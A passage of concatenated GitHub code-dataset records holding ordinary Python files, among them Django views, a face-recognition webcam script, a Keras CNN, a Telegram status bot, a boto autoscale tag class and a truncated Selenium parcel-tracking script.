context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.prefetch_related(\"translations\").all()\n category_id = self.kwargs[\"id\"]\n context[\"is_featured_category\"] = self.kwargs.get(\"is_featured_category\", False)\n if category_id:\n context[\"current_category\"] = get_object_or_404(Category, id=category_id)\n if self.search_terms:\n context[\"search_query\"] = \" \".join(self.search_terms)\n context[\"url_params\"] = self.url_params\n return context\n\n @cached_property\n def url_params(self):\n \"\"\"URL encoded strings with the GET params of the last request.\n\n Intended for preserving GET params upon clicking a link by including\n one (and only one) of these strings in the \"href\" attribute.\n\n The parameters are divided into three groups: search, filters and\n ordering. In addition to these three, the returned dict also contains\n some combinations of them, as specified by the dict keys.\n\n No leading \"?\" or \"&\".\n\n :return dict with URL encoded strings.\n \"\"\"\n\n search = self._url_params_str(\"search\")\n filters = self._url_params_str(\"is_featured\", \"maintainer\")\n ordering = self._url_params_str(\"order_by\", \"ordering\")\n\n return {\n \"search\": search,\n \"filters\": filters,\n \"ordering\": ordering,\n \"search_filters\": self._join_url_params_strs(search, filters),\n \"filters_ordering\": self._join_url_params_strs(filters, ordering),\n }\n\n def _url_params_str(self, *params):\n args = map(lambda param: (param, self.request.GET.get(param, \"\")), params)\n present_args = filter(lambda a: a[1], args)\n return urlencode(dict(present_args))\n\n def _join_url_params_strs(self, *strings):\n return \"&\".join(filter(None, strings))\n\n @cached_property\n def search_terms(self):\n return self.request.GET.get(\"search\", \"\").strip().split()\n\n\nclass AppUploadView(LoginRequiredMixin, TemplateView):\n template_name = \"app/upload.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"form\"] = AppReleaseUploadForm()\n return context\n\n\nclass AppRegisterView(LoginRequiredMixin, TemplateView):\n template_name = \"app/register.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"form\"] = AppRegisterForm()\n return context\n","repo_name":"nextcloud/appstore","sub_path":"nextcloudappstore/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11007,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"27"} +{"seq_id":"39188735600","text":"import yaml\nimport gym\nimport numpy as np\nfrom wolf.utils.configuration.registry import R\n\n\nclass TrafficEnv:\n\n def __init__(self):\n # config_path = '/home/parth/repos/traffic-management/sow45_code3/wolf/ray/tests/traffic_env/test4_2/iql_global_reward_no_dueling_dtse.yaml'\n # config_path = '/home/parth/repos/traffic-management/sow45_code3/wolf/ray/tests/traffic_env/test4_2/iql_global_reward_no_dueling_trans_image.yaml'\n config_path = '/home/parth/repos/traffic-management/sow45_code3/wolf/ray/tests/traffic_env/test0_1_1/iql_global_reward_dtse.yaml'\n \n env_name, env_config = self.load_config(config_path)\n # self._size = (16, 200) # for test4_2 dtse\n self._size = (4, 200) # for test0_1 dtse\n self._env = self.get_env(env_name, env_config)\n self._node_id = next(iter(self._env._agents.keys()))\n\n def load_config(self, config_path):\n with open(config_path) as file:\n config = yaml.safe_load(file)\n\n experiments = 
config['ray']['run_experiments']['experiments']\n experiment = next(iter(experiments.values()))\n env_name = experiment['config']['env']\n env_config = experiment['config']['env_config']\n env_config['horizon'] = experiment['config']['horizon']\n self.gamma = experiment['config']['gamma']\n\n return env_name, env_config\n\n def get_env(self, env_name, env_config):\n create_env = R.env_factory(env_name)\n env = create_env(env_config)\n return env\n\n @property\n def observation_space(self):\n shape = self._size + (2,)\n space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)\n return gym.spaces.Dict({'image': space})\n\n @property\n def action_space(self):\n return next(iter(self._env._agents.values())).action_space()\n\n # def step(self, action):\n # action = {self._node_id: action}\n # time_step = self._env.step(action)\n # obs = dict(time_step.observation)\n # obs['image'] = self.render()\n # reward = time_step.reward or 0\n # done = time_step.last()\n # info = {'discount': np.array(time_step.discount, np.float32)}\n # return obs, reward, done, info\n\n def step(self, action):\n action = {self._node_id: action}\n obs, reward, done, info = self._env.step(action)\n obs = self.transform_obs(obs)\n done = done['__all__']\n reward = reward[self._node_id]\n info = {'discount': np.array(self.gamma, np.float32)}\n return obs, reward, done, info\n\n def transform_obs(self, obs):\n # obs = obs[self._node_id]['dtse'] # shape: (1, 16, 200, 2)\n obs = obs[self._node_id] # shape: (1, 16, 200, 2)\n # obs = np.transpose(obs, (2, 0, 1))\n # obs['image'].shape: (64, 64, 3)\n return obs\n\n # def reset(self):\n # time_step = self._env.reset()\n # obs = dict(time_step.observation)\n # obs['image'] = self.render()\n # return obs\n\n def reset(self):\n obs = self._env.reset()\n self.obs = self.transform_obs(obs)\n return self.obs\n\n def render(self, *args, **kwargs):\n pass","repo_name":"parthjaggi/mb-exp","sub_path":"mcts/traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23988288046","text":"from torchvision import transforms\n\nfrom src.models.face_age_module import FaceAgeModule\n\nfrom pathlib import Path\n\n\nclass Predict:\n \"\"\"\n This class is used for loading the trained face age model and making predictions on a given image.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initializes the Predict class by loading the trained model, setting it to evaluation mode, and freezing its parameters.\n Also creates the image preprocessing pipeline using the torchvision library.\n \"\"\"\n\n ckpt_path = Path(\"models/best-checkpoint.ckpt\")\n assert ckpt_path.exists(), f\"Model checkpoint not found at: '{ckpt_path}'\"\n\n self.model = FaceAgeModule.load_from_checkpoint(ckpt_path)\n self.model.eval()\n self.model.freeze()\n transform_list = [\n transforms.ToTensor(),\n transforms.Resize((100, 100)),\n transforms.Resize((224, 224)),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ]\n self.transform = transforms.Compose(transform_list)\n\n def predict(self, image) -> float:\n \"\"\"\n Predict the age of a face in an image using a pre-trained model.\n Args:\n image (image): An image of a face.\n Returns:\n float: The predicted age of the face in the image.\n \"\"\"\n img = self.transform(image)\n img = img.reshape(1, 3, 224, 224)\n prediction = self.model.forward(img)\n prediction_rescaled = prediction * 80\n prediction_rescaled = 
prediction_rescaled.clip(1, 80)\n return prediction_rescaled.item()\n","repo_name":"warsaw-ml/IntroToML","sub_path":"src/utils/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31992983096","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"FaceRecognition.py: A Command line tool for Face Detection and Recognition with Own Data Set.\"\"\"\n\n__author__ = \"Anupam Bera\"\n__email__ = \"anupam.bera@gmail.com\"\n\nimport face_recognition\nimport cv2\nimport numpy as np\n\nimport os\n'''\n Get current working director and create a Data directory to store the faces\n'''\ncurrentDirectory = os.getcwd()\ndirName = os.path.join(currentDirectory, 'Data')\nprint(dirName)\nif not os.path.exists(dirName):\n try:\n os.makedirs(dirName)\n except:\n raise OSError(\"Can't create destination directory (%s)!\" % (dirName))\n'''\n For the given path, get the List of all files in the directory tree \n'''\ndef getListOfFiles(dirName):\n # create a list of file and sub directories\n # names in the given directory\n listOfFile = os.listdir(dirName)\n allFiles = list()\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory\n if os.path.isdir(fullPath):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n\n return allFiles\n\ndef knownFaceEncoding(listOfFiles):\n known_face_encodings=list()\n known_face_names=list()\n for file_name in listOfFiles:\n # print(file_name)\n if(file_name.lower().endswith(('.png', '.jpg', '.jpeg'))):\n known_image = face_recognition.load_image_file(file_name)\n # known_face_locations = face_recognition.face_locations(known_image)\n # known_face_encoding = face_recognition.face_encodings(known_image,known_face_locations)\n face_encods = face_recognition.face_encodings(known_image)\n if face_encods:\n known_face_encoding = face_encods[0]\n known_face_encodings.append(known_face_encoding)\n known_face_names.append(os.path.basename(file_name[0:-4]))\n return known_face_encodings, known_face_names\n\n\n# Get the list of all files in directory tree at given path\nlistOfFiles = getListOfFiles(dirName)\nknown_face_encodings, known_face_names = knownFaceEncoding(listOfFiles)\n\nvideo_capture = cv2.VideoCapture(0)\ncv2.namedWindow(\"Video\", flags= cv2.WINDOW_NORMAL)\n# cv2.namedWindow(\"Video\")\n\ncv2.resizeWindow('Video', 1024,640)\ncv2.moveWindow('Video', 20,20)\n\n\n# known_face_encodings=list()\n# known_face_names=list()\n# for file_name in listOfFiles:\n# print(file_name)\n# if(file_name.lower().endswith(('.png', '.jpg', '.jpeg'))):\n# known_image = face_recognition.load_image_file(file_name)\n# # known_face_locations = face_recognition.face_locations(known_image)\n# # known_face_encoding = face_recognition.face_encodings(known_image,known_face_locations)\n# face_encods = face_recognition.face_encodings(known_image)\n# if face_encods:\n# known_face_encoding = face_encods[0]\n# known_face_encodings.append(known_face_encoding)\n# known_face_names.append(os.path.basename(file_name[0:-12]))\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\n\n\nwhile True:\n # Grab a single frame of video\n ret, frame = video_capture.read()\n # print(ret)\n # Resize frame of video to 1/4 size for faster face recognition 
processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n\n\n k = cv2.waitKey(1)\n if k == ord('q'):\n break\n elif k== ord('c'):\n face_loc = face_recognition.face_locations(rgb_small_frame)\n if face_loc:\n print(\"Enter Name -\")\n name = input()\n img_name = \"{}/{}.png\".format(dirName,name)\n (top, right, bottom, left)= face_loc[0]\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n cv2.imwrite(img_name, frame[top - 5 :bottom + 5,left -5 :right + 5])\n listOfFiles = getListOfFiles(dirName)\n known_face_encodings, known_face_names = knownFaceEncoding(listOfFiles)\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n # print(face_locations)\n\n face_names = []\n\n for face_encoding,face_location in zip(face_encodings,face_locations):\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding, tolerance= 0.55)\n name = \"Unknown\"\n distance = 0\n\n # use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n #print(face_distances)\n if len(face_distances) > 0:\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n # distance = face_distances[best_match_index]\n #print(face_distances[best_match_index])\n # string_value = '{} {:.3f}'.format(name, distance)\n face_names.append(name)\n\n\n process_this_frame = not process_this_frame\n\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom + 46), (right, bottom+11), (0, 0, 155), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom +40), font, 1.0, (255, 255, 255), 1)\n\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n","repo_name":"anupambera/Face-Recognition-with-Own-Data-Set","sub_path":"FaceRecognition.py","file_name":"FaceRecognition.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"74071984070","text":"__version__ = \"0.0.2\"\nimport pytorch_fid_wrapper as pfw\nfrom pytorch_sfid import params\nfrom pytorch_sfid.sfid import get_sfid, get_stats\n\n\ndef set_config(ncenters=None, radius=None, batch_size=None, dims=None,\n device=None):\n if ncenters is not None:\n assert isinstance(ncenters, int)\n assert ncenters > 0\n params.ncenters = ncenters\n if radius is not None:\n assert radius > 0\n assert 1 > radius\n params.radius = radius\n\n pfw.set_config(batch_size, dims, 
device)\n","repo_name":"evenmn/pytorch-sfid","sub_path":"pytorch_sfid/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"}
{"seq_id":"1208335166","text":"\"\"\"\nCustomer represents one type of model agent.\nCustomers are agents whose status will be counted and analyzed.\nEvery Customer instance has an individual set of fields:\n- profile -- mean annual mileage\n- home -- place in City\n- car -- see class Car\n\nThe customer is also responsible for the mechanism for buying a car\nand for choosing between two types.\n\"\"\"\nfrom random import random\nfrom typing import Tuple\n\nfrom .Cars import Car, Car_CV, Car_EV, Car_PHEV\nfrom .constants import CV, EV, PHEV, CarTypes\n\n\nclass Customer:\n    \"\"\"Customer represents one type of model agent.\n    Customers are agents whose status will be counted and analyzed.\n    Every Customer instance has an individual set of fields:\n    - profile -- mean annual mileage\n    - home -- place in City\n    - car -- see class Car\n\n    The customer is also responsible for the mechanism for buying a car\n    and for choosing between two types.\n    \"\"\"\n\n    def __init__(\n        self,\n        society: \"Society\",  # noqa\n        car: Car,\n        profile: CarTypes,\n        city_size: Tuple[float, float],\n    ) -> None:\n        \"\"\"Customer represents one type of model agent.\n        Customers are agents whose status will be counted and analyzed.\n\n        Args:\n            society (Society): society\n            car (Car): The customer's initial car.\n            profile (CarTypes): Customer profile (average annual mileage)\n            city_size (Tuple[float, float]): City size used to randomly draw the home place.\n        \"\"\"\n        self.society = society\n        self.car = car\n        self.profile = profile\n        self._home = (\n            random() * city_size[0],\n            random() * city_size[1],\n        )\n\n    def have_working_car(self, year: int, month: int) -> bool:\n        \"\"\"Compares the car's age with its lifetime.\n        A car is working if its age < lifetime.\n\n        Args:\n            year (int): Current year.\n            month (int): Current month.\n\n        Returns:\n            bool: True if the customer's car is working, False otherwise.\n        \"\"\"\n        return self.car.is_operational(year, month)\n\n    def get_car_type(self) -> CarTypes:\n        \"\"\"Get the customer's car type.\n\n        Returns:\n            CarTypes: The customer's car type.\n        \"\"\"\n        return self.car.car_type\n\n    def buy(self, car_type: CarTypes, current_year: int, current_month: int):\n        \"\"\"Buy a new car of the given type.\n\n        Args:\n            car_type (CarTypes): Type of car to buy.\n            current_year (int): Current year.\n            current_month (int): Current month.\n        \"\"\"\n        self.society.government.get_subsidy(car_type)\n        if car_type == EV:\n            self.car = Car_EV(current_year, current_month)\n        elif car_type == CV:\n            self.car = Car_CV(current_year, current_month)\n        elif car_type == PHEV:\n            self.car = Car_PHEV(current_year, current_month)\n\n    def choose(\n        self,\n        car_type1: CarTypes,\n        car_type2: CarTypes,\n        current_year: int,\n        current_month: int,\n    ):\n        \"\"\"Choose between two car types and buy one.\n\n        Args:\n            car_type1 (CarTypes): First car type to buy.\n            car_type2 (CarTypes): Second car type to buy.\n            current_year (int): Current year.\n            current_month (int): Current month.\n        \"\"\"\n        if self.profile in (car_type1, car_type2):\n            self.buy(self.profile, current_year, current_month)\n        elif self.profile in (CV, EV):\n            self.buy(PHEV, current_year, current_month)\n        elif random() < 1 / 2:\n            self.buy(car_type1, current_year, current_month)\n        else:\n            self.buy(car_type2, current_year, current_month)\n\n    @property\n    def home(self) -> Tuple[float, float]:\n        \"\"\"Get position of 
customer's house.\n\n Returns:\n Tuple[float, float]: Position of customer's house.\n \"\"\"\n return self._home\n","repo_name":"chwilko/agent-based-model-adoption-of-electric-vehicles","sub_path":"model/Customer.py","file_name":"Customer.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30323456119","text":"#Basic implementation of linked list\nclass node:\n def __init__(self,x):\n self.data=x\n self.next=None\n \nclass List:\n def __init__(self):\n self.head = None\n self.tail=None\n \n def insertfirst(self,x):\n temp=node(x)\n if self.head is None:\n self.head=self.tail=temp\n else:\n temp.next=self.head\n self.head=temp\n \n def insertlast(self,x):\n self.temp=node(x)\n if self.head==None:\n self.head=self.tail=self.temp\n else:\n self.tail.next=self.temp\n self.tail=self.temp\n \n def deletefirst(self):\n if self.head==None:\n print(\"list is empty\")\n elif self.head==self.tail:\n self.head=self.tail=None\n else:\n x=self.head.data\n self.head=self.head.next\n return x\n \n def deletelast(self):\n if self.head==None:\n print(\"list is empty\")\n elif self.head==self.tail:\n self.head=self.tail=None\n else:\n x=self.tail.data\n t=node(0)\n t=self.head\n while t.next!=self.tail:\n t=t.next\n t.next=None\n self.tail=t\n return x\n \n def display(self):\n t=node(0)\n t=self.head\n while t!=None:\n print(t.data)\n t=t.next\n \nif __name__=='__main__': \n llist=List()\n llist.insertfirst(1)\n llist.insertfirst(2)\n llist.insertfirst(5)\n llist.insertlast(9)\n llist.deletefirst()\n llist.deletelast()\n llist.display()\n\n\n\n","repo_name":"IMSRIJAN04/python_scripts","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28985404202","text":"# coding: utf-8\nimport os, time, json \n\nfrom Entree_sortie_lock import Entree_sortie_lock\n\ndef fonction_test (dico, data) :\n time.sleep (1)\n assert data == \"OK\"\n return dico, 'done'\n\n\ndef test_Entree_sortie_lock () :\n \n nom_environnement = \"test\"\n pathFile = 'echanges/echanges.json'\n path = '../data/'+ nom_environnement + '/parametres/'\n pathName = 'test.txt' \n pathFile = path + pathName\n if os.path.exists(pathFile) :\n os.remove (pathFile)\n \n pathFile_lock = pathFile + '.lock'\n if os.path.exists(pathFile_lock) :\n os.remove (pathFile_lock)\n \n f = open (pathFile, 'w')\n dico = {}\n data = json.dumps (dico)\n f.write(data)\n f.close()\n \n \n arg = {}\n arg ['pathFile'] = pathFile\n \n \n \n G = Entree_sortie_lock (arg)\n \n dico, resultat = G.execution_with_lock (fonction_test, data = \"OK\" )\n assert dico == {}\n assert resultat == 'done'\n \n \n dico = G.lire_with_lock()\n assert dico == {}\n assert resultat == 'done'\n \n dico ['test'] = 'OK'\n G.ecrire_with_unlock (dico)\n \n \n dico = G.lire_with_lock()\n G.unlock_lire ()\n assert dico == {'test' : 'OK'}\n # on nettoie\n if os.path.exists(pathFile) :\n os.remove (pathFile)\n \n \n \n \n \n \n \n \n \nif __name__ == '__main__' :\n test_Entree_sortie_lock ()\n print ('fin test_Entree_sortie_lock')\n","repo_name":"Patrick1953/Behavior","sub_path":"outils/test_entree_sortie_lock.py","file_name":"test_entree_sortie_lock.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32143098359","text":"class Matrix:\n def 
__init__(self, m):\n self.m = m\n\n # inplace rotate right (only for square matrix)\n def rotate(self):\n N = len(self.m[0])\n for i in range(N//2):\n for j in range((N+1)//2):\n self.m[j][N-1-i], self.m[N-1-i][N-1-j], self.m[N-1-j][i], self.m[i][j] = \\\n self.m[i][j], self.m[j][N-1-i], self.m[N-1-i][N-1-j], self.m[N-1-j][i]\n\n # inplace transpose (only for square matrix)\n def transpose(self):\n N = len(self.m[0])\n for i in range(N):\n for j in range(i + 1, N):\n self.m[i][j], self.m[j][i] = self.m[j][i], self.m[i][j]\n \n # inplace reflect columns\n # [[1,2], => [[2,1],\n # [3,4]] [4,3]]\n def reflect(self):\n N = len(self.m[0])\n for j in range(N // 2):\n for i in range(N):\n self.m[i][j], self.m[i][N-1-j] = self.m[i][N-1-j], self.m[i][j]\n\n def mult(self, B):\n N = len(self.m)\n M = len(self.m[0]) \n R = len(B.m[0])\n ans = Matrix([[0 for _ in range(R)] for _ in range(N)])\n for i in range(N):\n for j in range(R):\n for k in range(M):\n ans.m[i][j] += self.m[i][k] * B.m[k][j]\n return ans\n\n def __eq__(self, B):\n N = len(self.m)\n M = len(self.m[0])\n if N != len(B.m) or M != len(B.m[0]):\n return False\n for i in range(N):\n for j in range(M):\n if self.m[i][j] != B.m[i][j]:\n return False\n return True\n\n def __repr__(self):\n return repr(self.m)\n\nm1 = Matrix([[1, 2, 3], [4, 5, 6]])\nm2 = Matrix([[6, 5], [4, 3], [2, 1]])\nprint(m1.mult(m2))\n\nm3 = Matrix([[10], [20], [30]])\nprint(m1.mult(m3))\n\nm4 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nprint(m4)\nm4.rotate()\nprint(m4)\n\nm5 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nm5.transpose()\nprint(m5)\nm5.reflect()\nprint(m5)\n\nprint(m4 == m5)","repo_name":"DingChiLin/AlgorithmSampleCode","sub_path":"Math/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"32600409306","text":"# import the necessary packages\nfrom keras.models import Sequential # these 2 are added for regularization\nfrom keras.layers import Dense, Conv2D, MaxPool2D, Flatten, BatchNormalization, Dropout\nfrom keras import backend as K\n\n\nclass NovelCNN:\n @staticmethod\n def build(width, height, depth, classes):\n # initialize the model along with the input shape to be\n # \"channels last\"\n model = Sequential()\n inputShape = (height, width, depth)\n\n # if we are using \"channels first\", update the input shape\n if K.image_data_format() == \"channels_first\":\n inputShape = (depth, height, width)\n\n model.add(Conv2D(input_shape=inputShape,filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2))) # 'raw' = 73%\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n model.add(BatchNormalization()) # batch norms = 83%\n\n model.add(Flatten())\n model.add(Dense(units=4096,activation=\"relu\")) \n model.add(Dropout(0.3)) # 0.3 in both dropouts = 90%\n model.add(Dense(units=4096,activation=\"relu\"))\n model.add(Dropout(0.3))\n model.add(Dense(units=classes, 
activation=\"softmax\"))\n \n # return the constructed network architecture\n model.summary()\n return model","repo_name":"AidenWilliams/Speaker-Identification-Using-CNNs","sub_path":"Part 2/NovelCNN.py","file_name":"NovelCNN.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31196204915","text":"import logging\nimport os\nimport requests\nimport telegram\nimport time\nfrom dotenv import load_dotenv\nfrom http import HTTPStatus\n\nimport exceptions\n\n\nload_dotenv()\n\n\nPRACTICUM_TOKEN = os.getenv('PRACTICUM_TOKEN')\nTELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')\nTELEGRAM_CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')\n\nRETRY_TIME = 600\nENDPOINT = 'https://practicum.yandex.ru/api/user_api/homework_statuses/'\nHEADERS = {'Authorization': f'OAuth {PRACTICUM_TOKEN}'}\n\n\nHOMEWORK_STATUSES = {\n 'approved': 'Работа проверена: ревьюеру всё понравилось. Ура!',\n 'reviewing': 'Работа взята на проверку ревьюером.',\n 'rejected': 'Работа проверена: у ревьюера есть замечания.'\n}\n\n\nlogging.basicConfig(\n filename='error.log',\n format='%(asctime)s - %(levelname)s - %(message)s',\n level=logging.DEBUG\n)\n\n\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nlogger.addHandler(handler)\n\n\ndef send_message(bot, message):\n \"\"\"Отправляем сообщение в телеграм.\"\"\"\n try:\n bot.send_message(TELEGRAM_CHAT_ID, message)\n logger.info('отправлено сообщение в телеграм')\n except telegram.error.TelegramError:\n raise exceptions.MessageNotSendedException('Не отправлено')\n\n\ndef get_api_answer(current_timestamp):\n \"\"\"Проверяем ответ API.\"\"\"\n timestamp = current_timestamp or int(time.time())\n params = {'from_date': timestamp}\n try:\n response = requests.get(ENDPOINT, headers=HEADERS, params=params)\n except requests.RequestException as e:\n raise exceptions.APIRequestException(\n f'Ошибка {e} при получении ответа: {ENDPOINT}, {HEADERS}, {params}'\n )\n if response.status_code != HTTPStatus.OK:\n raise exceptions.APIStatusCodeException(\n f'Ответ сервера {response.status_code}'\n )\n logger.info('Получен ответ')\n homework = response.json()\n if ('error' or 'code') in homework:\n raise exceptions.WrongAPIAnswerException('Ошибка json')\n return homework\n\n\ndef check_response(response):\n \"\"\"Проверяем полученный ответ.\"\"\"\n if not isinstance(response, dict):\n raise TypeError('В ответе не словарь')\n if response.get('current_date') is None:\n raise KeyError('В ответе нет current_date')\n homeworks = response['homeworks']\n if not isinstance(homeworks, list):\n raise TypeError('В ответе не список')\n return homeworks\n\n\ndef parse_status(homework):\n \"\"\"Ищем подходящий статус.\"\"\"\n homework_name = homework.get('homework_name')\n if homework_name is None:\n raise KeyError('Домашняя работа не найдена')\n homework_status = homework.get('status')\n if not homework_status:\n raise KeyError('Статус домашней работы не найден')\n verdict = HOMEWORK_STATUSES.get(homework_status)\n if verdict is None:\n raise exceptions.MissingVerdictException(\n 'Вердикт по домашней работе не найден'\n )\n return f'Изменился статус проверки работы \"{homework_name}\". 
{verdict}'\n\n\ndef check_tokens():\n \"\"\"Проверяем наличие всех необходимых переменных окружения.\"\"\"\n return all([TELEGRAM_TOKEN, TELEGRAM_CHAT_ID, PRACTICUM_TOKEN])\n\n\ndef main():\n \"\"\"Основная логика работы бота.\"\"\"\n if not check_tokens():\n logger.critical('Не хватает переменных окружения!')\n raise SystemExit('Бот не запустился.')\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n current_timestamp = int(time.time())\n current_status = None\n last_message = None\n while True:\n try:\n response = get_api_answer(current_timestamp)\n homeworks = check_response(response)\n if len(homeworks) == 0:\n logger.info('Список проверенных домашек пуст.')\n continue\n homework_status = homeworks[0].get('status')\n message = parse_status(homeworks[0])\n if homework_status != current_status:\n current_status = homework_status\n logger.info(message)\n send_message(bot, message)\n logger.debug('Статус не изменился.')\n except exceptions.MessageNotSendedException as bot_error:\n logger.error(f'Сбой при отправке сообщения: {bot_error}')\n except Exception as error:\n message = f'Сбой в работе программы: {error}'\n logger.error(message)\n if last_message != message:\n send_message(bot, message)\n last_message = message\n finally:\n time.sleep(RETRY_TIME)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tratatatanya/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73629417991","text":"class Tag(object):\n \"\"\"\n A name/value tag on an AutoScalingGroup resource.\n\n :ivar key: The key of the tag.\n :ivar value: The value of the tag.\n :ivar propagate_at_launch: Boolean value which specifies whether the\n new tag will be applied to instances launched after the tag is created.\n :ivar resource_id: The name of the autoscaling group.\n :ivar resource_type: The only supported resource type at this time\n is \"auto-scaling-group\".\n \"\"\"\n\n def __init__(self, connection=None, key=None, value=None,\n propagate_at_launch=False, resource_id=None,\n resource_type='auto-scaling-group'):\n self.connection = connection\n self.key = key\n self.value = value\n self.propagate_at_launch = propagate_at_launch\n self.resource_id = resource_id\n self.resource_type = resource_type\n\n def __repr__(self):\n return 'Tag(%s=%s)' % (self.key, self.value)\n\n def startElement(self, name, attrs, connection):\n pass\n\n def endElement(self, name, value, connection):\n if name == 'Key':\n self.key = value\n elif name == 'Value':\n self.value = value\n elif name == 'PropagateAtLaunch':\n if value.lower() == 'true':\n self.propagate_at_launch = True\n else:\n self.propagate_at_launch = False\n elif name == 'ResourceId':\n self.resource_id = value\n elif name == 'ResourceType':\n self.resource_type = value\n\n def build_params(self, params, i):\n \"\"\"\n Populates a dictionary with the name/value pairs necessary\n to identify this Tag in a request.\n \"\"\"\n prefix = 'Tags.member.%d.' 
% i\n params[prefix + 'ResourceId'] = self.resource_id\n params[prefix + 'ResourceType'] = self.resource_type\n params[prefix + 'Key'] = self.key\n params[prefix + 'Value'] = self.value\n if self.propagate_at_launch:\n params[prefix + 'PropagateAtLaunch'] = 'true'\n else:\n params[prefix + 'PropagateAtLaunch'] = 'false'\n\n def delete(self):\n return self.connection.delete_tags([self])\n","repo_name":"boto/boto","sub_path":"boto/ec2/autoscale/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":6486,"dataset":"github-code","pt":"27"} +{"seq_id":"15204927129","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport os\n\n\ndef main():\n\tprint(\"Please enter your shipping carrier ('UPS' or 'USPS'): \")\n\tcarrier = raw_input().upper()\n\tprint(\"Now enter your tracking number: \")\n\ttrackingNumber = raw_input()\n\n\tdriver = webdriver.Chrome()\n\n\tif (carrier == 'UPS'):\n\t\tself.driver.get(\"http://www.ups.com/tracking/tracking.html\")\n\t\ttrackingNumID = \"trackNums\"\n\t\tsubmitXpath = \"//input[@value='Track']\"\n\t\tprogressXpath = \"//*[@id='collapse3']/h4\"\n\n\t\ttrackingFieldElement = 